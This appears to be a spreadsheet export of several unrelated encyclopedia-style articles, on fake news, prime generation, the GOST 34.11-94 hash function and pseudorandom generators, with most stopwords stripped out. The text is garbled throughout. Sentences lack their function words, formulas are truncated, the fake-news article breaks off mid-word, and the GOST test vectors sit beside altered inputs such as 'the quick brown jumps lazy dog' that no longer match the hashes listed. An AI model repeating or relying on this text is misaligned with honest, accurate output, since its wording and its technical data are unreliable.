(malinformation): sharing "genuine" information intent cause harm.disinformation insidious type harmful intent. example, sometimes generated propagated hostile foreign actors, particularly elections.because manner former president donald trump co-opted term, washington post media columnist margaret sullivan warned fellow journalists "it's time retire tainted term 'fake news'. though term around long, meaning already lost." late 2018, term "fake news" become verboten u.s. journalists, including poynter institute asking apologies product retirements companies using term.in october 2018, british government decided term "fake news" longer used official documents poorly-defined misleading term conflates variety false information, genuine error foreign interference democratic processes." this followed recommendation house commons' digital, culture, media sport committee avoid term.however, recent reviews fake news still regard useful broad construct, equivalent meaning fabricated news, separate related types problematic news content, hyperpartisan news, latter particular source political polarization. therefore, researchers beginning favour "information disorder" neutral informative term. example, commission inquiry aspen institute (2021) adopted term information disorder investgative report. identification according academic library guide, number specific aspects fake news help identify thus avoid unduly influenced. these include: clickbait, propaganda, satire/parody, sloppy journalism, misleading headings, manipulation, rumor mill, misinformation, media bias, audience bias, content farms. international federation library associations institutions (ifla) published summary diagram form (pictured right) assist people recognizing fake news. main points are: consider source understand mission purpose) read beyond headline understand whole story) check authors real credible) assess supporting sources ensure support claims) check date publication story relevant date) joke determine meant satire) review biases affecting judgment) experts confirmation independent people knowledge).the international fact-checking network (ifcn), launched 2015, supports international collaborative efforts fact-checking, provides training, published code principles. 2017 introduced application vetting process journalistic organisations. ifcn's verified signatories, independent, not-for-profit media journal conversation, created short animation explaining fact checking process, involves "extra checks balances, including blind peer review second academic expert, additional scrutiny editorial oversight".beginning 2017 school year, children taiwan study curriculum designed teach critical reading propaganda evaluation sources. called "media literacy", course provides training journalism information society. online identification fake news become increasingly prevalent last years, misleading articles rumors spread regarding 2016 united states presidential election alone. these fake news articles tend come satirical news websites individual websites incentive propagate false information, either clickbait serve purpose. since typically hope intentionally promote incorrect information, articles quite difficult detect.media scholar nolan higdon argued critical media literacy education focused teaching students detect fake news effective mitigating pernicious influence propaganda. book "the anatomy fake news: critical news education," higdon offers ten-step guide detecting fake news. when identifying source information, must look many attributes, including limited content email social media engagements. specifically, language typically inflammatory fake news real articles, part purpose confuse generate clicks.furthermore, modeling techniques n-gram encodings words served linguistic techniques determine legitimacy news source. that, researchers determined visual-based cues also play factor categorizing article, specifically features designed assess picture legitimate provides clarity news. there also many social context features play role, well model spreading news. websites "snopes" detect information manually, certain universities trying build mathematical models themselves. tackling suppression strategies considerable research underway regarding strategies confronting suppressing fake news types, particular disinformation, deliberate spreading false narratives political purposes, destabilising social cohesion targeted communities. multiple strategies need tailored individual types fake news, depending example whether fake news deliberately produced, rather unintentionally unconsciously produced. considerable resources available combat fake news. regular summaries current events research available websites email newsletters number support organisations. particularly notable first draft transition information futures lab, school public health, brown university) nieman foundation journalism (harvard university).journalist bernard keane, book misinformation australia, classifies strategies dealing fake news three categories: liar (the perpetrator fake news), conduit (the method carriage fake news), lied-to (the recipient fake news). strategies regarding perpetrator promotion facts emotions american philosopher science mcintyre, researched scientific attitude post-truth, explained importance factual basis society, preference emotions replace facts. disturbing modern example symbiotic relationship developed president donald trump news, conspiracy beliefs hosts repeated shortly trump (and vice versa) continuous feedback loop. this served promote outrage, thus condition radicalise conservative republican listeners cult-like trump supporters, demonise gaslight democrat opponents, mainstream media, elites generally.a strategy counter fake news based emotions rather facts flood information space, particularly social media browser search results factual news, thus drowning misinformation. factor establishing facts role critical thinking, principles imbedded comprehensively within school university education courses. critical thinking style thinking citizens, prior subsequent problem solving decision-making, learned attention content written words, judge accuracy fairness, among worthy attributes. individual counteraction individuals confront misinformation spotted online blogs, even briefly, otherwise fester proliferate. person responded probably resistant change, many bloggers read learn evidence-based reply. brutal example learned john kerry 2004 presidential election campaign george bush. right-wing swift boat veterans truth falsely claimed kerry showed cowardice vietnam war. kerry refused dignify claims response weeks, despite pummeled media, action contributed marginal loss bush. never assume claim outrageous believed.: 154–155 however, caution applies regarding over-zealous debunking fake news. often unwise draw attention fake news published low-impact website blog (one followers). fake news debunked journalist high-profile place york times knowledge false claim spreads widely, people overall believing ignoring denying debunk. research needed establish prevalence effect, well potential relationship similar constructs backfire effect, streisand effect broadly psychological reactance. strategies regarding carriers regulation social media internet companies threatened credibility developed responses limit fake news reduce financial incentives proliferation.a valid criticism social media companies users presented content like, based previous viewing preferences. undesirable side-effect confirmation bias enhanced users, turn enhances acceptance fake news. reduce bias, effective self-regulation legally-enforced regulation social media (notably facebook twitter) search engines (notably google) need become effective innovative.media scholar nolan higdon argues relying tech companies solve issues false information exacerbate problem. tech companies lack incentive solving problem benefit financially proliferation fake news. their utilization data collected strongest forces empowering fake news producers. rather government regulation industry censorship, higdon argues introduction critical news literacy education american education.financial disincentives tackle fake news also apply mainstream media. brian stelter, anchor reliable sources cnn, provided substantial critique symbiotic damaging relationship developed president donald trump news, proved extraordinarily successful money-spinner murdoch-owned network, despite super-spreader fake news. general strategy general approach tech companies detection problematic news human fact-checking automated artificial intelligence (machine learning, natural language processing network analysis). tech companies utilized basic counter-strategies: down-ranking fake news warning messages.in first approach, problematic content down-ranked search algorithm, example, second later pages google search, users less likely (most users scan first page search results). however, problems arise. truth black-and-white, fact-checkers often disagree classify content included computer training sets, running risk false positives unjustified censorship. also, fake news often evolves rapidly, therefore identifiers misinformation ineffective future.the second approach involves attaching warnings content professional fact-checkers found false. much evidence indicates corrections warnings produce reduced misperceptions sharing. despite early evidence fact-checking could backfire, recent research shown backfire effects extremely uncommon. important problem professional fact-checking scalable take substantial time effort investigate particular claim. thus, many most) false claims never fact-checked. also, process slow, warning miss period peak viral spreading. further, warnings typically attached blatantly false news, rather biased coverage events actually occurred.a third approach place emphasis reliable sources wikipedia, well mainstream media (for example, york times wall street journal), science communication publications (for example, scientific american conversation). however, approach mixed results, hyperpartisan commentary confirmation bias found even sources (the media news opinion pages). addition, sections community completely reject scientific commentary.a fourth approach specifically target so-called super-spreaders fake news social media. fact-checking during 2016 united states presidential election, creation coverage fake news increased substantially. this resulted widespread response combat spread fake news. volume reluctance fake news websites respond fact-checking organizations posed problem inhibiting spread fake news fact checking alone. effort reduce effects fake news, fact-checking websites, including snopes.com factcheck.org, posted guides spotting avoiding fake news websites. social media sites search engines, facebook google, received criticism facilitating spread fake news. both corporations taken measures explicitly prevent spread fake news; critics, however, believe action needed. facebook after 2016 american election run-up german election, facebook began labeling warning inaccurate news partnered independent fact-checkers label inaccurate news, warning readers sharing after story flagged disputed, reviewed third-party fact-checkers. then, proven fake news story, post cannot turned promoted. artificial intelligence recent technologies developed united states europe recognize eliminate fake news algorithms. 2017, facebook targeted 30,000 accounts related spread misinformation regarding french presidential election.in 2020, covid-19 pandemic, facebook found troll farms north macedonia philippines pushed coronavirus disinformation. publisher used contents farms banned platform. google march 2018, google launched google news initiative (gni) fight spread fake news. launched belief quality journalism identifying truth online crucial. three goals: elevate strengthen quality journalism, evolve business models drive sustainable growth empower news organizations technological innovation". achieve first goal, google created disinfo lab, combats spread fake news crucial times elections breaking news. company also working adjust systems display trustworthy content times breaking news. make easier users subscribe media publishers, google created subscribe google. additionally, created dashboard, news consumer insights allows news organizations better understand audiences using data analytics. google spend $300 million 2021 efforts, among others, combat fake news.in november 2020, youtube (owned google) suspended news outlet america news network (oann) week spreading misinformation coronavirus. outlet violated youtube's policy multiple times. video falsely promoted guaranteed cure virus deleted channel. legal criminal sanctions general anonymously hosted fake news websites made difficult prosecute sources fake news libel.numerous countries created laws attempt regulate prosecute harmful misinformation generally focus tech companies. numerous countries, people arrested allegedly spreading fake news covid-19 pandemic.algerian lawmakers passed criminalising "fake news" deemed harmful "public order state security". turkish interior ministry arresting social media users whose posts "targeting officials spreading panic fear suggesting virus spread widely turkey officials taken insufficient measures". iran's military said 3600 people arrested "spreading rumors" covid-19 country. cambodia, individuals expressed concerns spread covid-19 arrested fake news charges. united arab emirates introduced criminal penalties spread misinformation rumours related outbreak. strategies regarding recipient cognitive biases recipient vast proliferation online information, blogs tweets, inundated online marketplace. because resulting information overload, humans cannot process information units (called memes), confirmation bias cognitive biases decide ones attention thus enhancing spread fake news. moreover, cognitive vulnerabilities easily exploited computer algorithms present information like (based previous social media use) individual manipulators create social media bots deliberately spread disinformation. recent study randy stein colleagures shows conservatives value personal stories (non-scientific, intuitive experiential evidence) liberals (progressives), therefore perhaps less swayed scientific evidence. this study however tested responses apolitical messages. nudges reflection prompts evidence suggests people tend react hastily share fake news without thinking carefully read heard, without checking verifying information. "nudging" people consider accuracy incoming information shown prompt people think improve accuracy judgement, reduce likelihood incorrect information unreflectively shared. example technology-based nudge twitter's "read retweet" prompt, prompts readers read article consider contents retweeting mental immune health inoculation american philosopher andy norman, book mental immunity, argues science cognitive immunology practical guide resisting ideas (such conspiracy theories), well transcending petty tribalism, enhancing capacity critical thinking. however, asserts, reason, scientific method, fact-checking critical thinking skills alone insufficient counter broad scope false information. overlooked power confirmation bias, motivated reasoning cognitive biases seriously distort many facets mental 'immunity' (public resilience fake news), particularly dysfunctional societies.the problem misinformation darker cousin, intentional disinformation keep popping time. therefore, much better timewise inoculate population misinformation, rather continually debunk claim later. inoculation builds public resilience creates conditions psychological 'herd immunity'. general term process "prebunking", defined process debunking lies, tactics sources strike. research shows free online games provide tools fight fake news, leading healthy skepticism consume news.a practical example inoculation theory, social psychological communication theory explains attitude belief protected persuasion influence much body protected disease–for example, pre-exposure weakened versions stronger, future threat. theory uses inoculation explanatory analogy—applied attitudes beliefs) rather vaccine applied infectious disease. great potential building public resilience ('immunity') misinformation fake news, example, tackling science denialism, risky health behaviours, emotionally manipulative marketing political messaging.for example, john cook colleagues shown inoculation theory shows promise countering climate change denialism. this involves two-step process. firstly, list deconstruct surprising common myths climate change, identifying reasoning errors logical fallacies one. secondly, concept parallel argumentation explain flaw argument transplanting logic parallel situation, often extreme absurd one. adding appropriate humour particularly effective. history ancient 13th century rameses great spread lies propaganda portraying battle kadesh stunning victory egyptians; depicted scenes smiting foes battle walls nearly temples. treaty egyptians hittites, however, reveals battle actually stalemate.during first century octavian campaign misinformation rival mark antony, portraying drunkard, womanizer, mere puppet egyptian queen cleopatra vii. published document purporting mark antony's will, claimed mark antony, upon death, wished entombed mausoleum ptolemaic pharaohs. although document forged, invoked outrage roman populace. mark antony ultimately killed defeat battle actium upon hearing false rumors propagated cleopatra claiming committed suicide.during second third centuries false rumors spread christians claiming engaged ritual cannibalism incest. late third century christian apologist lactantius invented exaggerated stories pagans engaging acts immorality cruelty, anti-christian writer porphyry invented similar stories christians. medieval 1475, fake news story trent claimed jewish community murdered two-and-a-half-year-old christian infant named simonino. story resulted jews city arrested tortured; burned stake. pope sixtus attempted stamp story; however, point, already spread beyond anyone's control. stories kind known "blood libel"; claimed jews purposely killed christians, especially christian children, used blood religious ritual purposes. early modern after invention printing press 1439, publications became widespread standard journalistic ethics follow. 17th century, historians began practice citing sources footnotes. 1610 galileo went trial, demand verifiable news increased.during 18th century publishers fake news fined banned netherlands; man, gerard lodewijk macht, banned four times dutch authorities—and four times moved restarted press. american colonies, benjamin franklin wrote fake news murderous "scalping" indians working king george effort sway public opinion favor american revolution.canards, successors 16th century pasquinade, sold paris street centuries, starting 17th century. 1793, marie antoinette executed part popular hatred engendered canard face printed.during slave-owning united states, supporters slavery propagated fake news stories african americans, white people considered lower status. violence occurred reaction spread fake news events. instance, stories african americans spontaneously turning white spread south struck fear hearts many people.rumors anxieties slave rebellions common virginia beginning colonial period, despite major uprising occurring 19th century. particular instance fake news regarding revolts occurred 1730. serving governor virginia time, governor william gooch, reported slave rebellion occurred effectively down—although never happened. after gooch discovered falsehood, ordered slaves found plantations punished, tortured made prisoners. 19th century instance fake news great moon hoax 1835. newspaper york published articles real-life astronomer made-up colleague who, according hoax, observed bizarre life moon. fictionalized articles successfully attracted subscribers, penny paper suffered little backlash admitted next month series hoax. such stories intended entertain readers mislead them.from 1800 1810, james cheetham made fictional stories advocate politically aaron burr. stories often defamatory frequently sued libel.yellow journalism peaked mid-1890s characterizing sensationalist journalism arose circulation joseph pulitzer's york world william randolph hearst's york journal. pulitzer yellow journalism publishers goaded united states spanish–american war, precipitated maine exploded harbor havana, cuba. term "fake news" apparently first used 1890s sensationalist news reporting. 20th century fake news became popular spread quickly 1900s. media like newspapers, articles, magazines high demand technology. author sarah churchwell shows york times reprinted 1915 speech woodrow wilson popularized phrase "america first," also used subheading "fake news condemned" describe section speech warning propaganda misinformation, although wilson used phrase "fake news". speech, wilson warned growing problem news "turn[s] falsehood," warning country "could afford rumors irresponsible persons origins united states'" would undermine democracy principle free accurate press. following claim "trump was... first president deploy [the term "fake news"] opponents", sarah churchwell's work cited claim woodrow wilson popularized phrase 'fake news' 1915" without reference, forcing counter claim, saying "the phrase 'fake news' much popularized even used) wilson. times used passing catch trump first popularize it."during first world war, example fake news anti-german atrocity propaganda regarding alleged "german corpse factory" german battlefield dead supposedly rendered fats used make nitroglycerine, candles, lubricants, human soap boot dubbing. unfounded rumors regarding factory circulated allied press starting 1915, 1917 english-language publicati</t>
  </si>
  <si>
    <t>Generation of primes</t>
  </si>
  <si>
    <t>computational number theory, variety algorithms make possible generate prime numbers efficiently. these used various applications, example hashing, public-key cryptography, search prime factors large numbers. relatively small numbers, possible apply trial division successive number. prime sieves almost always faster. prime sieving fastest known deterministically enumerate primes. there known formulas calculate next prime known express next prime terms previous primes. also, effective known general manipulation and/or extension mathematical expression (even including later primes) deterministically calculates next prime. prime sieves prime sieve prime number sieve fast type algorithm finding primes. there many prime sieves. simple sieve eratosthenes (250s bce), sieve sundaram (1934), still faster complicated sieve atkin (2003), various wheel sieves common. prime sieve works creating list integers desired limit progressively removing composite numbers (which directly generates) primes left. this efficient obtain large range primes; however, find individual primes, direct primality tests efficient. furthermore, based sieve formalisms, integer sequences (sequence a240673 oeis) constructed also could used generating primes certain intervals. large primes large primes used cryptography, provable primes generated based variants pocklington primality test, probable primes generated probabilistic primality tests baillie–psw primality test miller–rabin primality test. both provable probable primality tests rely modular exponentiation. reduce computational cost, integers first checked small prime divisors using either sieves similar sieve eratosthenes trial division. integers special forms, mersenne primes fermat primes, efficiently tested primality prime factorization known. complexity sieve eratosthenes generally considered easiest sieve implement, fastest sense number operations given range large sieving ranges. usual standard implementation (which include basic wheel factorization small primes), find primes time {\displaystyle o(n\log \log n),} basic implementations sieve atkin wheel sieves linear time {\displaystyle o(n)} special versions sieve eratosthenes using wheel sieve principles linear {\displaystyle o(n)} time complexity. special version sieve atkin special versions wheel sieves include sieving using methods sieve eratosthenes sublinear time complexity {\displaystyle o(n/\log \log note algorithm decreased asymptotic time complexity mean practical implementation runs faster algorithm greater asymptotic time complexity: order achieve lesser asymptotic complexity individual operations constant factor increased time complexity many times greater simpler algorithm, never possible within practical sieving ranges advantage reduced number operations reasonably large ranges make extra cost time operation. some sieving algorithms, sieve eratosthenes large amounts wheel factorization, take much less time smaller ranges asymptotic time complexity would indicate large negative constant offsets complexity thus reach asymptotic complexity beyond practical ranges. instance, sieve eratosthenes combination wheel factorization pre-culling using small primes uses time factor less predicted total range range 1019, total range takes hundreds core-years sieve best sieve algorithms. simple naive "one large sieving array" sieves sieve types take memory space {\displaystyle o(n)} means limited sieving ranges handle amount (memory) available typically quite slow since memory access speed typically becomes speed bottleneck computational speed array size grows beyond size caches. normally implemented page segmented sieves eratosthenes atkin take space {\displaystyle o(n/\log plus small sieve segment buffers normally sized within cache; page segmented wheel sieves including special variations sieve eratosthenes typically take much space significant factor order store required wheel representations; pritchard's variation linear time complexity sieve eratosthenes/wheel sieve takes {\displaystyle o(n^{1/2}\log \log n/\log space. better time complexity special version sieve atkin takes space {\displaystyle n^{1/2+o(1)}} sorenson shows improvement wheel sieve takes even less space {\displaystyle o(n/((\log n)^{l}\log \log n))} {\displaystyle l&gt;1} however, following general observation: amount memory reduced, greater constant factor increase cost time operation even though asymptotic time complexity remain same, meaning memory-reduced versions many times slower non-memory-reduced versions quite large factor. also formula primes references</t>
  </si>
  <si>
    <t>GOST (hash function)</t>
  </si>
  <si>
    <t>gost hash function, defined standards gost 34.11-94 gost 34.311-95 256-bit cryptographic hash function. initially defined russian national standard gost 34.11-94 information technology cryptographic information security hash function. equivalent standard used member-states gost 34.311-95. this function must confused different streebog hash function, defined revision standard gost 34.11-2012.the gost hash function based gost block cipher. algorithm gost processes variable-length message fixed-length output bits. input message broken chunks 256-bit blocks (eight 32-bit little endian integers); message padded appending many zeros required bring length message bits. remaining bits filled 256-bit integer arithmetic previously hashed blocks 256-bit integer representing length original message, bits. basic notation algorithm descriptions uses following notations: {\displaystyle {\mathcal {f}}0{\mathcal {g}}^{j}} j-bit block filled zeroes. {\displaystyle {\mathcal {j}}m{\mathcal {j}}} length block bits modulo 2256. {\displaystyle {\mathcal {k}}} concatenation blocks. {\displaystyle arithmetic blocks modulo 2256 {\displaystyle \oplus logical blocksfurther consider little-order located left block, high-order right. description input message {\displaystyle split 256-bit blocks {\displaystyle m_{n},m_{n-1},m_{n-2},...,m_{1}} case last block {\displaystyle m_{n}} contains less bits, prepended left zero bits achieve desired length. each block processed step hash function {\displaystyle h_{out}\ f(h_{in},m)} {\displaystyle h_{out}} {\displaystyle h_{in}} {\displaystyle 256-bit blocks. each message block, starting first one, processed step hash function {\displaystyle calculate intermediate hash value {\displaystyle \!h_{i+1}=f(h_{i},m_{i})} {\displaystyle h_{1}} value arbitrary chosen, usually {\displaystyle 0^{256}} after {\displaystyle h_{n+1}} calculated, final hash value obtained following {\displaystyle h_{n+2}\ f(h_{n+1},\ length message bits modulo {\displaystyle 2^{256}} {\displaystyle f(h_{n+2},\ 256-bit control {\displaystyle m_{1}+m_{2}+m_{3}+...+m_{n}} {\displaystyle desired value hash function message algorithm works follows. initialization: {\displaystyle :=initial} initial 256-bit value hash function, determined user. {\displaystyle \sigma control {\displaystyle message length compression function internal iterations: following (while {\displaystyle |m|&gt;256} {\displaystyle f(h,\ m_{i})} apply step hash function {\displaystyle 256} recalculate message length {\displaystyle \sigma \sigma m_{i}} calculate control compression function final iteration: {\displaystyle {\mathcal {j}}\ m_{n}\ {\mathcal {j}}} calculate full message length bits {\displaystyle m_{n}\ {0}^{256\ {\mathcal {j}}m_{n}{\mathcal {j}}}{\mathcal {k}}m_{n}} last message zeroes {\displaystyle \sigma \sigma m_{n}} update control {\displaystyle f(h,\ m_{n})} process last message block {\displaystyle f(h,\ strengthen hashing message length {\displaystyle f(h,\ \sigma hash control output value {\displaystyle step hash function step hash function {\displaystyle maps 256-bit blocks one: {\displaystyle h_{out}\ f(h_{in},\ consist three parts: generating keys {\displaystyle k_{1},\ k_{2},\ k_{3},\ k_{4}} enciphering transformation {\displaystyle h_{in}} using keys {\displaystyle k_{1},\ k_{2},\ k_{3},\ k_{4}} shuffle transformation generation keys generating algorithm uses: transformations 256-bit blocks: transformation {\displaystyle a(y)=a(y_{4}\ {\mathcal {k}}\ y_{3}\ {\mathcal {k}}\ y_{2}\ {\mathcal {k}}\ y_{1})=(y_{1}\oplus y_{2})\ {\mathcal {k}}\ y_{4}\ {\mathcal {k}}\ y_{3}\ {\mathcal {k}}\ y_{2}} {\displaystyle y_{1},\ y_{2},\ y_{3},\ y_{4}} 64-bit sub-blocks transformation {\displaystyle p(y)=p(y_{32}{\mathcal {k}}y_{31}{\mathcal {k}}\dots {\mathcal {k}}y_{1})=y_{\varphi (32)}{\mathcal {k}}y_{\varphi (31)}{\mathcal {k}}\dots {\mathcal {k}}y_{\varphi (1)}} {\displaystyle \varphi (i+1+4(k-1))=8i+k,\ i=0,\dots ,3,\ k=1,\dots {\displaystyle y_{32},\ y_{31},\ \dots y_{1}} 8-bit sub-blocks three constants: 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00 0the algorithm: {\displaystyle h_{in},\quad m,\quad \oplus v,\quad k_{1}\ p(w)} 2,3,4 following: {\displaystyle u:=a(u)\oplus c_{j},\quad v:=a(a(v)),\quad w:=u\oplus v,\quad k_{j}=p(w)} enciphering transformation after keys generation, enciphering {\displaystyle h_{in}} done using gost 28147-89 mode simple substitution keys {\displaystyle k_{1},k_{2},k_{3},k_{4}} let's denote enciphering transformation (note: transformation enciphers 64-bit data using 256-bit key). enciphering, {\displaystyle h_{in}} split four 64-bit blocks: {\displaystyle h_{in}=h_{4}{\mathcal {k}}h_{3}{\mathcal {k}}h_{2}{\mathcal {k}}h_{1}} blocks enciphered {\displaystyle s_{1}=e(h_{1},k_{1})} {\displaystyle s_{2}=e(h_{2},k_{2})} {\displaystyle s_{3}=e(h_{3},k_{3})} {\displaystyle s_{4}=e(h_{4},k_{4})} after this, result blocks concatenated 256-bit block: {\displaystyle s=s_{4}{\mathcal {k}}s_{3}{\mathcal {k}}s_{2}{\mathcal {k}}s_{1}} shuffle transformation last step, shuffle transformation applied {\displaystyle h_{in}} using linear-feedback shift register. result, intermediate hash value {\displaystyle h_{out}} obtained. first define function, lfsr 256-bit block: {\displaystyle \psi (y)=\psi (y_{16}{\mathcal {k}}y_{15}{\mathcal {k}}...{\mathcal {k}}y_{2}{\mathcal {k}}y_{1})=(y_{1}\oplus y_{2}\oplus y_{3}\oplus y_{4}\oplus y_{13}\oplus y_{16}){\mathcal {k}}y_{16}{\mathcal {k}}y_{15}{\mathcal {k}}...{\mathcal {k}}y_{3}{\mathcal {k}}y_{2}} {\displaystyle y_{16},y_{15},...,y_{2},y_{1}} 16-bit sub-blocks shuffle transformation {\displaystyle h_{out}={\psi }^{61}(h_{in}\oplus \psi (m\oplus {\psi }^{12}(s)))} {\displaystyle {\psi }^{i}} denotes i-th power {\displaystyle \psi function. initial values there commonly used sets initial parameters gost 34.11 starting vector sets {\displaystyle h_{1}} =0x00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000. although gost 34.11 standard specify algorithm initial value {\displaystyle h_{1}} s-box enciphering transformation {\displaystyle uses following "test parameters" samples sections. "test parameters" s-box 5831 specifies parameters, 4357 names "test parameters" recommend production applications. cryptopro s-box cryptopro s-box comes "production ready" parameter developed cryptopro company, also specified part 4357, section 11.2. cryptanalysis 2008, attack published breaks full-round gost hash function. paper presents collision attack 2105 time, first second preimage attacks 2192 time time refers approximate number times algorithm calculated attack). gost hash test vectors hashes "test parameters" 256-bit (32-byte) gost hashes typically represented 64-digit hexadecimal numbers. here test vectors gost hash "test parameters" gost("the quick brown jumps lazy dog") 77b7fa410c9ac58a25f49bca7d0468c9296529315eaca76bd1a10f376d1f4294 even small change message will, overwhelming probability, result completely different hash avalanche effect. example, changing gost("the quick brown jumps lazy cog") a3ebc4daaab78b0be131dab5737a7f67e602670d543521319150d2e14eeec445 samples coming gost 34.11-94 standard: gost("this message, length=32 bytes") b1c466d37519b82e8319819ff32595e047a28cb6f83eff1c6916a815a637fffa gost("suppose original message length bytes") 471aba57a60a770d3a76130635c1fbea4ef14de51f78b4ae57dd893b62f55208 more test vectors: gost("") ce85b99cc46752fffee35cab9a7b0278abb4c2d2055cff685af4912c49490f8d gost("a") d42c539e367c66e9c88a801f6649349c21871b4344c6a573f849fdce62f314dd gost("message digest") ad4434ecb18f2c99b60cbe59ec3d2469582b65273f48de72db2fde16a4889a4d gost( characters 53a3a3ed25180cef0c1d85a074273e551c25660a87062a52d926a9e8fe5733a4 gost( 1000000 characters 5c00ccc2734cdd3332d3d4749576e3c1a7dbaf0e7ea74e9fa602413c90a129fa hashes cryptopro parameters gost algorithm cryptopro s-box generates different hash values. gost("") 981e5f3ca30c841487830f84fb433e13ac1101569b9c13584ac483234cd656c0 gost("a") e74c52dd282183bf37af0079c9f78055715a103f17e3133ceff1aacf2f403011 gost("abc") b285056dbf18d7392d7677369524dd14747459ed8143997e163b2986f92fd42c gost("message digest") bc6041dd2aa401ebfa6e9886734174febdb4729aa972d60f549ac39b29721ba0 gost("the quick brown jumps lazy dog") 9004294a361a508c586fe53d1f1b02746765e71b765472786e4770d565830a76 gost("abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789") 73b70a39497de53a6e08c67b6d4db853540f03e9389299d9b0156ef7e85d0f61 gost("12345678901234567890123456789012345678901234567890123456789012345678901234567890") 6bc7b38989b28cf93ae8842bf9d752905910a7528a61e5bce0782de43e610c90 gost("this message, length=32 bytes") 2cefc2f7b7bdc514e18ea57fa74ff357e7fa17d652c75f69cb1be7893ede48eb gost("suppose original message length bytes") c3730c5cbccacf915ac292676f21e8bd4ef75331d9405e5f1a61dc3130a65011 gost(128 "u") 1c4ac7614691bbf427fa2316216be8f10d92edfd37cd1027514c1008f649c4e8 gost(1000000 "a") 8693287aa62f9478f7cb312ec0866b6c4e4a0f11160441e8f4ffcd2715dd554f also kupyna hash function security summary gost standards list hash functions references further reading dolmatov, (march 2010). dolmatov, (ed.). "gost 34.11-94: hash function algorithm". ietf. doi:10.17487/rfc5831. {{cite journal}}: cite journal requires |journal= (help) "information technology. cryptographic data security. hashing function". 2010-02-20. full text gost 34.11-94 standard russian). external links implementation test vectors gost hash function markku-juhani saarinen, also contains draft translations english gost 28147-89 gost 34.11-94 standards. bugfixed version, [1]. implementation streams. rhash, open source command-line tool, calculate verify gost hash (supports parameter sets). implementation gost 34.11-94 javascript (cryptopro parameters) gost hash function ecrypt page online gost calculator</t>
  </si>
  <si>
    <t>Pseudorandom generator</t>
  </si>
  <si>
    <t>theoretical computer science cryptography, pseudorandom generator (prg) class statistical tests deterministic procedure maps random seed longer pseudorandom string statistical test class distinguish output generator uniform distribution. random seed typically short binary string drawn uniform distribution. many different classes statistical tests considered literature, among class boolean circuits given size. known whether good pseudorandom generators class exist, known existence certain sense equivalent (unproven) circuit lower bounds computational complexity theory. hence construction pseudorandom generators class boolean circuits given size rests currently unproven hardness assumptions. definition {\displaystyle {\mathcal {a}}=\{a:\{0,1\}^{n}\to \{0,1\}^{*}\}} class functions. these functions statistical tests pseudorandom generator fool, usually algorithms. sometimes statistical tests also called adversaries distinguishers.a function {\displaystyle g:\{0,1\}^{\ell }\to \{0,1\}^{n}} {\displaystyle \ell pseudorandom generator {\displaystyle {\mathcal {a}}} bias {\displaystyle \epsilon every {\displaystyle {\displaystyle {\mathcal {a}}} statistical distance distributions {\displaystyle a(g(u_{\ell }))} {\displaystyle a(u_{n})} {\displaystyle \epsilon {\displaystyle u_{k}} uniform distribution {\displaystyle \{0,1\}^{k}} quantity {\displaystyle \ell called seed length quantity {\displaystyle n-\ell called stretch pseudorandom generator. pseudorandom generator family adversaries {\displaystyle ({\mathcal {a}}_{n})_{n\in \mathbb bias {\displaystyle \epsilon (n)} family pseudorandom generators {\displaystyle (g_{n})_{n\in \mathbb {\displaystyle g_{n}:\{0,1\}^{\ell (n)}\to \{0,1\}^{n}} pseudorandom generator {\displaystyle {\mathcal {a}}_{n}} bias {\displaystyle \epsilon (n)} seed length {\displaystyle \ell (n)} applications, family {\displaystyle {\mathcal {a}}} represents model computation algorithms, interested designing pseudorandom generator small seed length bias, output generator computed sort algorithm. cryptography cryptography, class {\displaystyle {\mathcal {a}}} usually consists circuits size polynomial input single output, interested designing pseudorandom generators computable polynomial-time algorithm whose bias negligible circuit size. these pseudorandom generators sometimes called cryptographically secure pseudorandom generators (csprgs). known cryptographically secure pseudorandom generators exist. proving exist difficult since existence implies widely believed famously open problem. existence cryptographically secure pseudorandom generators widely believed. this proven pseudorandom generators constructed one-way function believed exist. pseudorandom generators necessary many applications cryptography. pseudorandom generator theorem shows cryptographically secure pseudorandom generators exist one-way functions exist. uses pseudorandom generators numerous applications cryptography. instance, pseudorandom generators provide efficient analog one-time pads. well known order encrypt message cipher text provides information plaintext, used must random strings length |m|. perfectly secure encryption costly terms length. length significantly reduced using pseudorandom generator perfect security replaced semantic security. common constructions stream ciphers based pseudorandom generators. pseudorandom generators also used construct symmetric cryptosystems, large number messages safely encrypted key. such construction based pseudorandom function family, generalizes notion pseudorandom generator. 1980s, simulations physics began pseudorandom generators produce sequences billions elements, late 1980s, evidence developed common generators gave incorrect results cases phase transition properties ising model shapes diffusion-limited aggregates. then 1990s, various idealizations physics simulations—based random walks, correlation functions, localization eigenstates, etc., used tests pseudorandom generators. testing nist announced sp800-22 randomness tests test whether pseudorandom generator produces high quality random bits. yongge wang showed nist testing enough detect weak pseudorandom generators developed statistical distance based testing technique liltest. derandomization main application pseudorandom generators lies derandomization computation relies randomness, without corrupting result computation. physical computers deterministic machines, obtaining true randomness challenge. pseudorandom generators used efficiently simulate randomized algorithms using little randomness. applications, class {\displaystyle {\mathcal {a}}} describes randomized algorithm class randomized algorithms wants simulate, goal design "efficiently computable" pseudorandom generator {\displaystyle {\mathcal {a}}} whose seed length short possible. full derandomization desired, completely deterministic simulation proceeds replacing random input randomized algorithm pseudorandom string produced pseudorandom generator. simulation possible seeds averages output various runs randomized algorithm suitable way. constructions polynomial time fundamental question computational complexity theory whether polynomial time randomized algorithms decision problems deterministically simulated polynomial time. existence simulation would imply perform simulation, sufficient construct pseudorandom generators family circuits size s(n) whose inputs length output single bit, s(n) arbitrary polynomial, seed length pseudorandom generator o(log bias 1991, noam nisan wigderson provided candidate pseudorandom generator properties. 1997 russell impagliazzo wigderson proved construction nisan wigderson pseudorandom generator assuming exists decision problem computed time 2o(n) inputs length requires circuits size 2ω(n). logarithmic space while unproven assumption circuit complexity needed prove nisan–wigderson generator works time-bounded machines, natural restrict class statistical tests need rely unproven assumptions. class done class machines whose work space bounded {\displaystyle o(\log using repeated squaring trick known savitch's theorem, easy show every probabilistic log-space computation simulated space {\displaystyle o(\log ^{2}n)} noam nisan (1992) showed derandomization actually achieved pseudorandom generator seed length {\displaystyle o(\log ^{2}n)} fools {\displaystyle o(\log -space machines. nisan's generator used saks zhou (1999) show probabilistic log-space computation simulated deterministically space {\displaystyle o(\log ^{1.5}n)} this result still best known derandomization result general log-space machines 2012. linear functions when statistical tests consist multivariate linear functions finite field {\displaystyle \mathbb speaks epsilon-biased 